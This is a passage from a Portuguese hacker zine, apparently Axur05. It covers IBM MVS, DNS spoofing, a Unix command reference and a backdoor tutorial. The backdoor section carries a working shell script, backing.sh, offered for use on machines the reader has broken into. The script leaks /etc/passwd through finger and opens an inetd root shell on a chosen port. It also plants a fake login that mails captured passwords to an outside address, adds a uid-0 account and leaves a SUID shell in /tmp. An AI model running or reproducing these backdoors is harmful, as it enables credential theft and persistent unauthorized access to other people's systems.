os nomes das series de dados pode ser usado para simular hierarquias. A linguagem usada para c comunicar c/ o sistema, e a JCL(Job Control Language). Comumentemente, sao usadas tres instrucoses basicas: JOB, EXEC e DD. Vamos a elas: JOB - Define um job e alguns de seus limites. EXEC - faz com que o MVS execute modulos de carregamento ou outros arqui- vos em JCL. DD - Define uma serie de dados e suas caracteristicas. O espaco de enderecamento do MVS esta dividido em tres partes: sistema, comum e areas privadas. A area d sistemas contem o nucleo do sistema operacional, a area comum, contem rotinas e blocos de controles usados com menos frequencia, e a area privada e usada para as tarefas e seu espaco virtual. Apesar de possiveis erros d sofware e hardware, a maior preocupacao da IBM ao desenvolver o sistema, foi que ele tentasse sempre "estar em pe", independente da cagada de seus administradores. Assim, o MVS possui um eficiente gerenciador de Recuperacao de Terminacao (RTM - Recovery Termi- nation Manager), que responde aos possiveis erros de softwares; e tambem possui um suporte de gerenciamento de erros de Hardware (Recovery Manage- ment Support - RMS). Em virtude de seu ambiente grande porte, o gerenciamento de dados e com- plexo. O MVS, suporta 4 organizacoes d serie de dados: particionada, fi- sica sequencial, indexada sequencial e direta. Ele tambem proporciona muitos metodos de acesso, incluindo o QISAM, BISAM, BPAM, BDAM, VTAM e VSAM. Alguns casos, como por exemplo o BISAM, QISAM e BSAM, nao sao comuns, mas existem para compatibilidade com sistemas mais antigos. No que c refere a gerenciamento de memoria, as tarefas consistem-se, em segmentos e tabelas. A transformacao de enderecos e feita usando-se a chamada Translation Lookaside Buffers (TLB) ou tabelas de segmentos e de paginas. A TLB e sempre pesquisada primeiro. Se uma pagina nao e en- contrada, sao pesquisadas as tabelas de segmento e de paginas. A E/S do MVS, utiliza-se de canais e programas de canais para manipular a transferencia de dados. A base de dados de E/S requer muitos blocos de controle para localizar e descrever a serie d dados, alocar perifericos e sincronizar acesso. O MVS, cria a maior parte deles, antes da execucao da Tarefa. Quando uma tarefa emite uma solicitacao, os metodos de acesso, criam um programa de canal. O MVS entao inicia a E/S usando uma instrucao de SIO. O canal manipula a transferencia e interrompe a CPU apos seu ter- mino. ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 3:> DNS Spoofing ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by csh ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù 1. Overview DNS spoof consta em um "spoof" (trapaca em ingles) no servidor de nomes, fazendo com que voce possa ter um nome para o seu IP em qquer servidor (se ele ja' nao estiver fixed). 2. Como funciona? Se voce nunca mexeu com DNS, nao leia, pois nao vou perder meu tempo tentando escrever pra lamers! Por outro lado, leia os rfcs que falam de name-servers. Digamos, um domain name, que tenha delegacao (que rode o servico de DNS) do dominio axur05.org: axur05.org name server NS1.resolver.net axur05.org name server NS2.resolver.net axur05.org has address 207.137.117.195 NS1.resolver.net e NS2.resolver.net delegam o dominio axur05.org, eles tbem informam que axur05.org tem o endereco 207.137.117.195. Agora vem o detalhe... se instalarmos um name server no server da axur, vamos poder por mais dominios... tipo... spoof IN NS 207.137.117.196 bom... quando formos requerer o dominio spoof.axur05.org, ele vai procurar nesse endereco, 207.137.117.196 como spoofar? eh soh colocar um named hackeado na makina spoof, e dizer quem spoof.axur05.org eh um nickname parar "host a ser spoofado" e que esse host a ser spoofado tem endereco X. apos setupar o hacked server, vc deve dar um nslookup no nameserver a ser cacheado. Exemplo: nslookup spoof.axur05.org NS1.resolver.net apos isso, confirme o seu spoof: nslookup "host a ser spoofado" NS1.resolver.net E era isso.... ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 4:> Backdoors ( teoria e pratica ) ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Hehehe... essa vai ser divertida! Ao contrario dos zines que mostram e mostram metodos, resolvemos inovar e ver o que acontece! Ou nos imitam ou vamos pra banha. Explicarei a seguir os estilos de backdoors mais utilizados e conhecidos do pessoal. Nao tem misterio algum, vou tentar expo-las de forma que nao fiquem duvidas e seja entendido o procedimento que foi usado. 1- link do /etc/passwd no .plan Este e' um metodo muito facil, porem pouco utilizado. Creio que nao seja conhecido do pessoal. Ele se baseia no seguinte principio, uma vez dentro do provedor e com acesso e super-usuario voce pode fazer uma serie de modificacoes nos arquivos lah existentes. Sendo assim, imagine a situcao... quando voce dah um finger em algum usuario de alguma maquina aparece o seguinte: olyz:~# finger root Login: root Name: The roouter Directory: /project Shell: /bin/bash On since Mon Sep 30 16:54 (EDT) on tty6 No mail. Agora tambem e' do seu conhecimento que o finger trabalha com os ar- quivos ".plan", ".project" e o ".forward". Estes arquivos tem dentro informacoes que nao importam a mimina para no's. Ai que entra a sacanagem... Voce esta com permissao, nao esqueca, faz um link normal do .plan pa- ra o /etc/passwd ( ou /etc/opasswd ou /etc/security/opasswd ) sei lah qual o sistema que voce vai utiliza-lo. E o que acontecera? olyz:~# ln -s /etc/passwd .plan olyz:~# finger root Login: root Name: The roouter Directory: /project Shell: /bin/bash On since Mon Sep 30 16:29 (EDT) on tty4 On since Mon Sep 30 16:32 (EDT) on tty5 23 seconds idle Last login Mon Sep 30 16:54 (EDT) on tty6 No mail. Plan: root:Jovl41fdofLrM:0:0:The roouter:/project:/bin/bash ( etc.... ) Tchan! Ai esta a senha do root com mais um bocado que vai aparecer, soh nao coloco as outras pq nao nos interessa. Para que esta backdoor funcione esteja certo de que o servico de finger esteja funcionando ou ative esta linha no inted.conf finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -w Este esquema vai preservar suas contas shell. Fraco! mas funciona! 2- Backdoor instalada em uma porta qualquer Aqui e' uma das partes mais importantes do nosso trabalho, instalar uma backdoor para se obter acesso remoto a nossa vitima a qualquer hora do dia ( ou em horas pre'-determinadas ). Primeiro vamos entender como funcionam as portas no sistema com ar- quitetura unix. Como ja sabemos o protocolo TCP reserva portas para programas ja co- nhecidos por nos, sendo que por convencao do padrao, estas sao ma- peadas a determinadas aplicacoes, nao devem superar o limite de 256. A maiorida destas portas ficam entao disponiveis ao sistema operaci- onal que deve aloca-las conforme a demanda de solicitacao das aplica- coes. Como vemos abaixo, port e aplicacao especifica. Decimal Keyword UNIX Keyword Descricao 0 Reservado 1 TCPMUX - TCP Multiplexor 5 RJE - Remote job entry 7 ECHO echo Echo 9 DISCARD discard Discard 11 USERS systat Active Users ( etc... ) Existem servicos registrados... porem muitas portas que nao tem nada ai que entra voce, podendo ativa-las e utiliza-las para se conectar a sua vitima! Existem dois arquivos que se encarregam desta configuracao, sao eles: /etc/inetd.conf e o /etc/services. No arquivo "services" voce cria a porta, cuidando sempre para nao u- sar uma que o sistema requer, e no arquivo "inted.conf" voce habili- ta ela para funcionar. Nao vou ficar explicando muito essa parte pq ja foi publicado infos sobre elas bem detalhadas pelos rapazes da codez ( www.codez.com ) e tambem pq ja teve um outro zine aqui no Brasil que traduziu o pu- blicado no CRH003 ( nao me levem a mal ). Neste caso o que precisamos saber e' que a linha padrao para o ar- quivo inetd.conf e': /etc/inetd.conf ( veja documentacao do linux ) ........... 1 2 3 4 5 6 7 talk dgram udp wait root /usr/sbin/tcpd in.talkd ........... Onde os campos definem por ordem: / O nome do daemon, nome pelo qual o inted vai catar no / /etc/services para ver qual porta usara para conectar. 1: Se criares um servico novo, tenha cuidado para no repe- \ tir o nome. No caso de servicos baseados em Sun-RPC de \ uma boa olhada no /etc/rpc e na documentacao. 2: / Aqui voce escolhe o tipo do socket dependendo do que vo- \ ve quer, pode ser: stream, dgram, raw, rdm ou seqpacket. 3: / Protocolo aqui deve ser um dos colocados no arquivo \ /etc/protocols determinando seu tipo. /Tempo de espera pra completar a conexao! ( neste caso do, 4: talk... ele espera ate ser aceito na maquina. ) No caso do \parametro omitido ele adota como 40 segundos como maximo. 5: Soh colocar o username do usuario que requisitou o servico. 6: Qual programa que vai fazer a conexao. 7: O nome do daemon requisitado ou do comando a ser executado. Ok, ok.. agora voce pode montar a sua linha conforme suas necessi- dades. Agora de um vi no /etc/services e veras a linha padrao: talk 517/udp # talk port Essa seria a linha do nosso exemplo, pode-se chegar a conclusao de que o servico usa a porta 517 e usa como padrao o "user datagram protocol" e depois tem um comentario indicado pela "cerquinha". Modifique a vontade... mas lembre-se sempre que eles trabalham em conjunto tanto o services quando o inetd.conf 3- Logando senha do usario Este e' um metodo legal pra quem nao quer se chatear por ter pego root e nao conseguir a senha ( principalmente em AIX ). O carinha vai se logar no sistema com login e senha.. neste caso o root e vai receber uma mensagem de erro pedindo reentrada da senha, acos- tumado com sua mah digitacao ele sem bobear escreve seu login e e senha novamente, soh que desta vez os mesmos foram enviados por mail para voce ( ou quem quer que seja ). Modificando o .profile voce pode simular esta operacao. Se voce souber faze-lo pode rea- lizar o mesmo sem deixar rastros. Fiz um programinha para faze-lo automaticamente ( testado em li- nux, mas qualquer pessoa com cerebro porta ele pra outro sistema). Veja o shell script no final da materia... Exemplo: Welcome to Linux 2.1.0. olyz login: root Password: Last login: Mon Sep 30 16:54:26 on tty6 Linux 2.1.0. Login incorrect olyz login: root Password: Linux 2.1.0. olyz:~# Como no exemplo podemos ver, ele apresenta a tela de entrada normal ai o admin ou seja lah quem for digita seu login e sua senha, ele vai coloca-los corretamente! Soh que na tela vai aparecer uma msg de erro com o "Login incorrect", repare que antes disso o usuario ja esta logado com msg "Last login: Mon Sep 30 16:54:26 on tty6..." soh que dificilmente alguem repara nisso! E' mais facil a pessoa ter er- rado a senha do que alguem ter instalado uma backdoor lah =) Agora a melhor parte... E' gerado entao um arquivo chamado por mim .asno neste arquivo estao os dados necessarios a voce. Olhem o que contem o arquivo: -------------------- .asno ------------------- Axur05 - Keylog - www.axur05.org LOGIN: root SENHA: axur1997 HOSTNAME: olyz.roouter HORA: Mon Sep 30 17:43:25 1996 -------------------- .asno ------------------- Este arquivo vai ser enviado via mail para onde voce desejar =) O .profile foi deletado pelo meu programa e o profile default res- taurado ao seu lugar. Se voce for inteligente em poucos dias vai receber centenas de mails enviando senhas. Importante que o .profile com backdoor foi deletado por ele mesmo, o programinha que eu fiz para automatizar o processo funciona UMA uni- ca vez por instalacao, para ser mais preciso, o proximo usuario que se logar no sistema no /home onde voce instalou tera sua senha logada. 4 - Backdoor utilizando recurssos do cron O cron e' um processo que se inicia apatir de quando o sistema UNIX comecar a rodar. Ele possui a capacidade de executar comandos em in- tervalos de tempo pre determinados e especificados no crontab. Em alguns sistemas operecionais mais antigos havia um arquivo para todos os usuarios, hoje nos mais modernos no diretorio crontab ficam varios arquivos que levam o nome do usuario e que se restringem a exe- cutar as intrucoes do mesmo. Diferente do at e do batch pelo fato de continuar executando a instrucao como em um ciclo. Cron e' o mesmo que cronografo nome do daemon do unix responsavel pe- la administracao do tempo . ( daemon e' aquele processo que roda na maciota e e'idependente de qualquer terminal.) As informacoes de que o cron precisa esta num arquivo geralmente no /var/spool/cron/crontabs ou /usr/spool/cron, depende muito do sistema em questao. O bichinho chamado cron entao dorme e acorda a cada minuto pra che- car se precisas executa alguma ordem, ai ele procura no arquivo do crontab pelas linhas que demarcam seu tempo de atuacao e sua tarefa. Os administradores costumam usar o cron pra limpeza e atualizacao de dados. O cron e' reinicializado toda vez que o relogio do sistema e' mudado. Voce pode utilizar dos recurssos dele mesmo sem se super usuario, a- penas com o registro no /usr/lib/cron/cron.allow qualquer usuario tem direito a programacao de processos! (diretorio muda conforme sis- tema. Ou no cron.deny onde podem te impedir de usa-lo. Toda vez que vc modificar o crontab com algum programa tipo vi, vc precisa executar o crontab outra vez para que ele reconheca a nova ordem. Formato dele e' simples: minuto(s) hora(s) dia_do_mes mes dia_da_semana comando --------- ------- ---------- --- ------------- ------- 00-59 1-24 1-31 1-12 0-6 """" > minutos - quantidade de minutos apos o comando e' executado. valor 00 e' a hora redonda. > hora - neste campo pode variar de 1 da manha ate 24 horas. > dia_do_mes - dia do mes em que entrara em acao. > mes - duh? :) > dia_da_semana - 0 ate 6 significando de domingo a sabado. + Lembre-se que no caso do caractere "*" indica que os comandos se- rao executados de hora em hora, mes em mes, minutos em minutos, etc... conforme indicacao de campo. > comando - aqui vc pode colocar QUALQUER COISA, ja da pra imaginar as facilidades que se tem! Usando criatividade pode-se muito com o crontab. Nas cadeias de comando vc pode usar o "/" a vontade para dar maior arrojo a sua linha e capacitar a continuar a mesma ordem em outra linha sem quebrar comandos. Em versoes diferentes do UNIX o log do cron pode variar de local es- tando em: /usr/lib/cron/log ou /usr/adm/cronlog. Veja exemplo abaixo no shell script feito por mim para testar possi- bilidades do cron. 5 - Shell com SUID Bah! Essa e' legal... interessante pelo fato de vc poder esconder dentro de uma maquina um arquivo que num passe de magica de trans- formara em super usuario. O esquema ai se baseia no fato de criar uma copia do /bin/sh para dentro de qualquer diretorio com qualquer nome. Ai entao se muda a permissao do arquivo a modo de que ele fiquei com SUID ou SGID. Isso mesmo, aqueles arquivinhos que vc nao deve ter que possuem caracteristica do : ---s------ ou do ------s--- Seguimos entao com o exemplo, pq acho que permissoes todo mundo ja sabe. Uma vez root executamos... # /bin/cp /bin/sh /tmp/-foo # chmod 4755 /tmp/-foo Agora qualquer usuario que nao for root pode executa-lo: % /tmp/-foo # Porque o arquivo se chama -foo? Bom frescura minha, mas ajuda... afinal o diretorio tmp e' constan- temente limpo pelas funcoes do cron ou pelo admin, agora um arquivo que e' chamado -foo nao pode ser deletado pelo metodo normal, o que diferencia ele e' o "-" na frente do arquivo. Se tomarmos o rm -r -foo ou o rm -foo echoara uma mensagem de erro. Este arquivo pode ser deletado apenas com os comandos: # rm ./-foo # rm -i * Ou por algum programa tipo o mc. Bom, sei lah! Ajuda... mas nao e' o suficiente para te manter bem colocado num sistema. Digamos que e' uma saida rapida em caso de emergencia e uma boa pedida para administradores burros. obs. tput's podem ser desativados, deixei assim pra ficar mais interes- sante e ilustrativo. ---- backing.sh - #!/bin/sh # (c) 1997 by AciDmuD bold=`tput bold` discor=`tput rmso` pisca=`tput blink` limpa=`tput clear` para=`tput rmso` # ative opcao lendo antes txt do zine #cron1 ( ) #{ #echo -e ${limpa} # cd $HOME/ ; cd ; cd ~/ #echo -e ${bold}Instalacao de backdoor usando recurssos do crontab #${para}'\n' #echo -e "Dia da ativacao ( use * para todos )":'\c' #read ativacao; #echo -e "Mes da ativacao ( use * para todos )":'\c' #read mes; #echo -e "Hora da ativacao ( idem )":'\c' #read hora; #echo -e "Minutos ( idem )":'\c' #read min; #echo -e Nao sera levado em consideracao o dia da semana!!'\n' #echo -e Linha de comando que sera executada:'\c' #read linha; #echo -e Sua backdoor sera ativada no mes:${mes} dia:${ativacao} as #${hora}:${mi$echo -e Com a linha de comando: ${linha} ##### crie nessa linha o direcionamento variavel do sistema ##### #} fingerback ( ) { echo -e ${limpa} cd $HOME/ ; cd ; cd ~/ if [ ! -f ".plan" ] then echo " Arquivo ${bold}.plan${para} nao existe" echo " Criando arquivo" echo " Pressione ENTER" read junk; fi echo -e '\n\n' echo -e ${bold}Backdoor utilizando finger instalada!!! ${para}'\n' echo -e "- > Copiando .plan para .plan.OLD ( copiado )" echo -e `cp .plan .plan.OLD`'\n' echo -e "- > Removendo .plan ( removido )" echo -e `rm .plan`'\n' echo -e "- > Linkando o arquivo /etc/passwd ao arquivo ~/.plan ( linkado )" echo -e `ln -s /etc/passwd .plan`'\n' echo -e ${pisca}" Pressione qualquer tecla pra voltar ao MENU"${para} read junk; sh "$0" } fake1 ( ) { cd $HOME/ ; cd ; cd ~/ echo -e `rm .profile` echo "echo -e '\n'Login incorrect'\n'" >> .profile echo "echo -e `uname -n` "login:" '\c'" >> .profile echo "read login;" >> .profile echo "echo -e Password:'\c'" >> .profile echo "stty -echo" >> .profile echo "read pass;" >> .profile echo "echo" >> .profile echo "echo Axur05 - Keylog - www.axur05.org >> .asno" >> .profile echo "echo LOGIN: `echo $``echo login` >> .asno">> .profile echo "echo SENHA: `echo $``echo pass` >> .asno">> .profile echo "echo HOSTNAME: `cat /etc/HOSTNAME` >> .asno">> .profile echo "echo HORA: `clock` >> .asno">> .profile echo "mail acidmud@axur05.org < .asno" >> .profile echo "rm `echo $``echo HOME`/.profile ; rm .asno">> .profile echo "cp /etc/profile `echo $``echo HOME`/.profile">> .profile echo "stty echo" >>.profile echo "cat /etc/motd" >>.profile echo Processo executado echo O proximo usuario que se logar neste /home vai ter a senha logada echo -e ${pisca}"Pressione qualquer tecla pra voltar ao MENU"${para} read junk; sh "$0" } echo1 ( ) { echo ${limpa} echo -e ${bold}Echo de usuario no /etc/passwd ${para}'\n' echo -e "Escolha o username do usuario a ser criado:"'\c' read user; echo -e "O programa esta criando o usuario $user com id 0" password=`wc -l /etc/passwd | /bin/cut -d'/' -f1` echo -e Tem $password linhas seu arquivo de senhas... joga=$[$password/2+1] echo O usuario sera criado na linha de numero $[$joga+1]. rabo=$[$joga-$password] echo -e `echo $user::0:0:The roouter:/root:/bin/bash` > .u9 tail -n$rabo /etc/passwd >> .u9 ; head -n$joga /etc/passwd > .u8 cat .u9 >> .u8 ; rm .u9 ; cp .u8 /etc/passwd ; rm .u8 echo "Nao sou um daemon9, mas ta feito =)" echo -e ${pisca}"Pressione qualquer tecla pra voltar ao MENU"${para} read junk; sh "$0" } porta1 ( ) { echo ${limpa} echo -e ${bold}Backdoor usando uma porta qualquer${para}'\n' serv=/etc/services inet=/etc/inetd.conf if [ ! -f $serv ]; then echo -e Nao encontrei o arquivo /etc/services echo Abortando operacao!!! ; exit 1 ; sh $0 fi if [ ! -f $inet ]; then echo -e Nao encontrei o arquivo /etc/inetd.conf echo Abortando operacao ; exit 1 ; sh $0 fi echo -e Informe o nome do servico que sera criado:'\c' read servico; echo -e Informe o numero da porta que sera criada:'\c' read porta; echo -e Criando servico: [$servico], na porta [$porta] echo $servico" "$porta/tcp >> /etc/services echo $servico" stream tcp nowait root /bin/sh sh -i">> /etc/inetd.conf echo -e Criado! echo -e Matando processo do inetd if [ -r /var/run/inetd.pid ]; then kill -HUP `cat /var/run/inetd.pid` else kill -HUP inetd fi echo -e Morto! echo -e Iniciando inetd novamente.'\n' inetd echo -e ${pisca}"Pressione qualquer tecla pra voltar ao MENU"${para} read junk; sh $0 } cheu ( ) { echo -e ${limpa} echo -e ${bold}"Criando arquivo ( -foo ) no diretorio /tmp com suid!"${para} cd /tmp /bin/cp /bin/sh /tmp/-foo chmod 7555 ./-foo echo -e Criado... echo -e ${pisca}"Pressione qualquer tecla pra voltar ao MENU"${para} read junk; sh $0 } help1 ( ) { echo ${limpa} echo -e ${bold}HELP${para} '\n' echo Procure informacoes sobre os processos na axur05 numero 03 echo -e Voce encontra a revista no endereco www.axur05.org'\n' echo -e ${pisca}"Pressione qualquer tecla pra voltar ao MENU"${para} read junk; sh "$0" } if [ $EUID != 0 ]; then echo ${limpa} echo 'Axur05 Script - Instalacao de backdoors by AciDmuD' echo '------------- ----------------------- ----------' echo Voce esta no sistema: ${bold}echo `/bin/uname -a | /bin/cut -d: -f1,2`${para} echo 'Voce nao tem acesso de root nesta maquina! =)' fi if [ $EUID = 0 ]; then echo ${limpa} echo 'Axur05 Script - Instalacao de backdoors by AciDmuD' echo '------------- ----------------------- ----------' echo Voce esta no sistema: ${bold} `/bin/uname -a | /bin/cut -d: -f1,2`${para} echo -e 'Escolha no menu a seguir a backdoor a ser instalada\n\n' echo -e ${bold}'MENU'${para}'\n\n' echo 1:. Finger linkado aos /etc/passwd echo 2:. backdoor na porta 345 echo 3:. "fake login com mail ( logando password )" echo 4:. backdoor utilizando recursos do cron ( ative opcao ) echo 5:. echo no /etc/passwd echo 6:. arquivo no tmp usando suid echo 7:. help echo -e 8:. ir dormir porque ja eh tarde'\n\n' echo -e "Opcao: [ ]"'\b\b\c' read opcao case $opcao in 1)fingerback;; 2)porta1;; 3)fake1;; 4)cron1;; 5)echo1;; 6)cheu;; 7)help1;; 8)exit;; esac fi ---- backing.sh - that's all folks ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 5:> Lista final de comandos para unix - Parte II ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Ai vai o final da lista que eu prometi no primeiro numero da nossa re- vista. ( que vergonha!!! ) Bom e' como eu digo, nao cobrem nada de mim ja que jamais cobrei algo de voces. Utilizem o que tem aqui como uma graca da nossa parte e nao como se fossemos obrigados a fazer =) Se voce sabe nao precisa ler a lista... E se mesmo assim voce ta resmungando, faca uma melhor ;) Juntando com a da primeira revista suponho que seja a maior lista e mais completa em portugues dos comandos do Unix e seus clones. find O comando find e' uma ferramenta poderossisima dentro do ambiente UNIX. Por meio deste comando po- desse copiar, encontrar, executar e modificar ar- quivos. Sua funcao exata e' satisfazer a expressao boleana da linha de comando. A busca sempre inicia do diretorio de partida espe- cificado. # find / -name jacareh -print Aqui se procura desde a raiz todos os arquivos com o nome "jacareh" ecoando na tela com o -print. Podemos usar meta-caracteres para espeficiar um ar- quivo sem problema algum. # find / -name jacareh -exec cp {} ~/ \; Aqui ele procura o jacareh soh que executa a ordem de copiar todos os arquivos "jacareh" encontrados pra dentro do diretorio $/HOME ou ~/ Voce pode usar infinitos parametros com ele, de uma consultada no manual do find e divirta-se com as possibilidades. grep Grep vem do "get regular expression" e e' base dos comandos da familia grep. Funciona como um filtro q examina arquivos de entrada em busca de padroes. # grep opcoes expressao arquivo(s) Nas opcoes: -c : produz a contagem das linhas. -i : nao leva em conta diferenca de caixa alta e baixa. -l : soh exibe os nomes de arquivos com os padroes. -n : ativa a numeraca de linhas ( muito bom ). -s : causa a supressao das mensagens de erro. -v : imprime as linhas onde se encontra o padrao. Coloque a expressao entre pilicas representando o padrao procurado que nao tem erro. # grep 'root' /etc/passwd ou... # cat /etc/passwd | grep 'root' Embora resultados iguais o segundo e' mais lento por envolver dois processos. kill Nao tem misterio, apenas encerra processos que estao ativos no sistema. Existe gracas ao unix ser um OS multitarefa. Voce sendo usuario normal soh pode encerrar seus pro- cessos, ja o root super usuario pode encerrar todos os processos inclusive o 0. O sinal default e' 15 = SIGTERM (terminar). Ja a opcao 9 e' um raio e encerra matando bicho com um tiro na cabeca... # kill -numero_do_sinal PID O 9 e'o SIGKILL causa termino incondicional. Com o comando ps se pode listar os processos ativos. ld E' o editor de ligacao, muito usado. Combinando mul- tiplos arquivos objetos em um unico modulo de execu- cao. Eu uso: # ld -opcoes nome(s)_do(s)_arquivo(s) -m : fornece o mapa de ligacao -o : especifica o modulo de saida ( output ) Qualquer duvida consulte o UNIX Sys V Ref. Man. lint Este comando e' legal porque verifica a sintaxe de codigo C antes da compilacao. Tambem identifica erros que possam ter ocorrido, como variaveis nao usadas e tal... # lint opcoes arquivo(s) -h : suprime testes que identifique erros. -n : suprime informacoes sobre codigo nao portatil. -p : habilita pra fazer um teste mais rigoroso. Este comando ajuda o programador a nao perder tempo. ln Famoso link. Usado pra criar ligacoes entre arqui- vos. Soh SP=(super usuario) pode ligar diretorios. Modificar o link e' modificar a origem. # ln -s /home/globo/documento.doc porcarias.doc Linkamos o documento.doc ao arquivo porcarias.doc Para se desfazer do link usamos o rm ou o unlink. make Utilitario muito utilizado pelos desenvolvedores em UNIX pra automatizar processo de geracao de pro- gramas. Ele le o arquivo de entrada "Makefile" e vai realizando o servico sobre as dependencias. Ele faz tudo, desde compilar ate ligar os modulos. # make all < isso tomando como base um Makefile que tenha esta opcao > -e : indica as variaveis do sistema q devem preva- lecer. -i : despreza os codigos retornados. -k : abandona o trabalho na entrada corrente. -n : lista apenas os comandos do Makefile. -p : echoa para impressora os comandos. -r : despreza as regras intrinsecas. -s : modo silencioso. -t : atualiza data e hora mkdir Cria diretorios ( me sinto tao mal falando isso ). mv Move arquivos de um lugar ao outro. Funciona pare- cido com o cp exceto pelo fato de apagar o source do arquivos depois de copiar. Tambem sobrepoe o arquivo se ele ja existir sem pe- dir confirmacao alguma. # mv /usr/src/linux.tar.gz /home/usuario1/linux.tar.gz od Exibe um arquivo em octal. Tambem pode ser em hexa, ASCII, decimal ou ate combinacoes destes. # od -opcoes arquivo -b : exibe bytes em octal -c : exibe bytes em ASCII -d : exibe palavra como decimal sem sinal -o : exibe palavra em octal -x : exibe palavra em hexa pack Este rapaz le o arquivo de entrada normalmente e produz como saida uma versao comprimida. Recebem o sufixo ".z" que indica a compressao. Em arquivos texto chega a compactar 70% ja em bina- rios atinge menos que 15%. Utilizando ele com o find podemos ter: # find /usr/jacuh -print | cpio -ocv > transarq pack -f transarq ps O comando `ps' reporta a situacao dos processos atuais no unix. E' o mesmo que o velho "d a,l" das maquinas MVS da IBM. As opcoes -e e -f sao de maior interesse para de- senvolvedores, ja que reportam todas as infos. Usando o parametro -ef surgem 8 colunas. 1. Coluna UID: identifica a ID do dono do processo. 2. Coluna PID: identifica o numero ID do processo. 3. Coluna PPID: identifica o processo pai. 4. Coluna C: indica a quantidade de utilizacao do processador para escalamento. 5. Coluna STIME: indica a hora que o processo foi iniciado. 6. Coluna TTY: indica o terminal de controla asso- ciado ao processo. 7. Coluna TIME: tempo total da execucao que o pro- cesso acumulou. 8. Coluna COMMAND: descreve o nome do processo in- dicando qual comando esta sendo executado. pwd Esse comando e' usado para mostrar o diretorio cor- rente, e e', na realidade um acronimo de print wor- king directory. Geralmente nao reporta erros :/ rm Esse comando e' usado para remover arquivos do siste- ma de arquivos do UNIX. Utilizando as opcoes -f, -r e -i ( mais usadas ). Para diretorios use opcao -r. Para se utilizar destes comandos deve-se ter permis- sao sobre os arquivos a serem excluidos. Com a opcao -i vc tera possibilidade de confirmar a remocao do arquivo. Use com cuidado a opcao rm -rf principalmente quando tiveres permissao de super usuario. A utilizacao de coringas tb e' desaconselhada. nao tente: rm -rf / ou * rmdir Comando utilizado para remover diretorios vazios da estrutura. E' aconselhavel que se utilize toda estrutura na hora do comando ex.: # rmdir /home/users1/billgates sed Esse comando e' o editor do sistema. E' uma versao bem mais fraca do awk eu suponho, na realidade pode se usar como um filtro. Pode-se por vez "editar" grandes arquivos em um ro- teiro do shell. Um roteiro do shell pode ser tornado extremamente inteligente atraves do use do comando "sed". Exemplo real dele pode ser o fato de querer se trocar todas as ocorrencias do tipo "axur" para "AXUR" em um arquivo qualquer. # sed s/axur/AXUR/g ~/axur0503.old /tmp/axur0503.new Usando o fonte no home e com saida no /tmp. sort Sua funcao e' produzir arquivos ordenados como fala o nome. Temos como opcao: -c : verifica se um arquivo ja esta ordenado de acor- do. -m : toma os arquivos de entrada como previamente or- denados e somente os funde na saida. -u : compara arquivos especificados evitando duplici- dade. -o : especifica nome do arquivo de saida -d : especifica que a ordenacao deve usar ordem do dicionario. -f : depreza diferenca de caixa. -i : intrui o sort de nao levar em conta os caracte- res que estejam em ascii. -r : inverte a sequencia de ordenacao. -t : identifica o caracter a ser usado como delimi- tador. +n : n indica o iniciodo numero do campo no qual ter- minar a ordenacao. Exemplo: # sort arquivo1 arquivo2 # sort -o seilah arquivo1 arquivo2 # sort -urf arquivo1 arquivo2 > seilah # ls -l | sort -r +5 -7 # ls -l | sort -o seilah -r +5 # ls -l | sort -r +5 -7 > seilah Onde o primeiro ordena os arquivos chamados ar- quivo1 e arquivo2. No segundo executa o mesmo mas a saida e' gravada em um arquivo chamado seilah. No terceiro usa o metodo de redirecionamento para colocar a saida no arquivo chamado ordenado en- quanto as opcoes -urf indicam que os registros de- vem ser unicos e gravados em ordem invertida e as diferencas de caixa nao devem ser levadas em conta. spell Utilitario q verifica a grafia no unix. Eu usei ele bastante no SCO ( nao no linux ). Nao cabe entrar em detalhes sobre ele, quase ninguem usa e nao to afim de descreve-lo. stty O comando stty pode ser usado para alterar ou para verificar certas caracteristicas do terminal. Todos os usuarios com sessao aberta no UNIX devem possuir essas caracteristicas estabelecidas. Elas podem incluir informacoes como tipo de conexao e velocidade, caracteres especiais, dados de contro- le de fluxo e caracteristica da linha de comunica- cao. Acho que os ajustes que terao interesse imediato provavelmente serao aqueles como mudar o caracter de retrocesso, a paridade e a velocidade da linha e como voltar os caracteres de apagamento de cara- ter e de linha para seus valores. ( bah! ) Algumas especificacoes validas abaixo: # stty -a Esse comando exibe uma listagem longa de todos os valores configuraveis do stty e seus valores atuais. # stty erase '^H' Este exemplo acerta o caracter de retrocesso como de apagamento de caracter. # stty kill '#' Este exemplo coloca o caracter # como caracter de a- pagamento de linha. # stty ek Esse exemplo volta os caracteres de apagamento de caracter e de linha para seus valores, respectiva- mente '#' e '@'. # stty parodd Seta paridade impoar "-parodd" oposto de paridade par. Que e' aquele esquema q todos sabem que defi- ne o bit que vai servir de checagem 7/8. # stty cs8 Esse exemplo indica que um caracter tem 8 bits de dados; os valores sao cs5-8, sendo padrao 7. # stty 19200 Atribui velocidade ao 